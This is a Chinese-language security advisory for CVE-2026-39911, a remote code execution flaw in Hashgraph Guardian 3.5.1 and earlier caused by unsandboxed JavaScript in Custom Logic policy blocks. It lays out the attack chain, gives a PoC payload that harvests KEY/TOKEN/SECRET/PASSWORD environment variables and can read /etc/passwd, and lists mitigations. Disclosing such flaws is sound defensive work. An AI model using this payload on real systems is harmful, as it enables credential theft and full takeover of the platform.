CVE-2026-39911 CVSS 8.8 高危

CVE-2026-39911 Hashgraph Guardian远程代码执行漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39911

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Hashgraph Guardian

漏洞概述

Hashgraph Guardian 3.5.1及之前版本存在远程代码执行漏洞。该漏洞源于Custom Logic策略块工作进程中未沙箱化的JavaScript执行机制。经过认证的Standard Registry用户可以将用户提供的JavaScript表达式直接传递给Node.js Function()构造函数，从而绕过隔离限制。攻击者可利用此漏洞导入原生Node.js模块，读取容器文件系统中的任意文件，窃取敏感环境变量（如RSA私钥、JWT密钥等），并伪造管理员令牌，完全控制系统。

技术细节

该漏洞的核心在于Hashgraph Guardian的Custom Logic功能未对用户输入的JavaScript代码进行有效的沙箱隔离。当用户提交Custom Logic策略时，系统直接将输入传递给Node.js的Function()构造函数进行动态执行。由于缺乏隔离环境（如vm2或适当的上下文限制），攻击者构造的恶意代码可以直接访问宿主Node.js的全局对象和原生模块。攻击者可以通过require('fs')读取服务器上的任意文件，通过require('process').env获取包含敏感凭证的环境变量。利用窃取到的JWT签名密钥，攻击者可以伪造有效的认证令牌，进而提升权限至管理员，实现对整个平台的完全控制。

攻击链分析

STEP 1

步骤1：身份认证

攻击者获取一个Standard Registry级别的低权限账户凭证。

STEP 2

步骤2：访问脆弱功能

登录后，访问Custom Logic策略块配置功能，准备提交自定义逻辑。

STEP 3

步骤3：注入恶意代码

在策略块中构造恶意的JavaScript代码，利用Node.js Function()构造函数绕过限制，引入原生模块如require('child_process')或require('fs')。

STEP 4

步骤4：执行代码与窃取数据

服务器执行恶意代码，攻击者读取文件系统内容或环境变量（如私钥、API Token）。

STEP 5

步骤5：权限提升与接管

利用窃取的JWT签名密钥伪造管理员令牌，获得系统最高权限，执行任意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Malicious payload to be injected into the Custom Logic policy block
// This payload demonstrates reading environment variables using Node.js process module

(function() {
    try {
        // Import native Node.js modules
        const process = require('process');
        const fs = require('fs');

        // Extract sensitive environment variables
        const env = process.env;
        const sensitiveData = {};
        
        // Look for keys, tokens, and secrets
        Object.keys(env).forEach(key => {
            if (key.match(/KEY|TOKEN|SECRET|PASSWORD/i)) {
                sensitiveData[key] = env[key];
            }
        });

        // Read a specific file (e.g., /etc/passwd)
        // const fileContent = fs.readFileSync('/etc/passwd', 'utf-8');
        
        // Return the stolen data (simulated exfiltration)
        return JSON.stringify(sensitiveData);
    } catch (error) {
        return 'Error: ' + error.message;
    }
})();

影响范围

Hashgraph Guardian <= 3.5.1

防御指南

临时缓解措施

建议立即限制Custom Logic策略块的访问权限，仅允许受信任的用户使用，并检查系统日志是否存在异常的文件读取或进程调用行为。在未升级前，应禁用Custom Logic功能或监控所有出站流量以防数据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表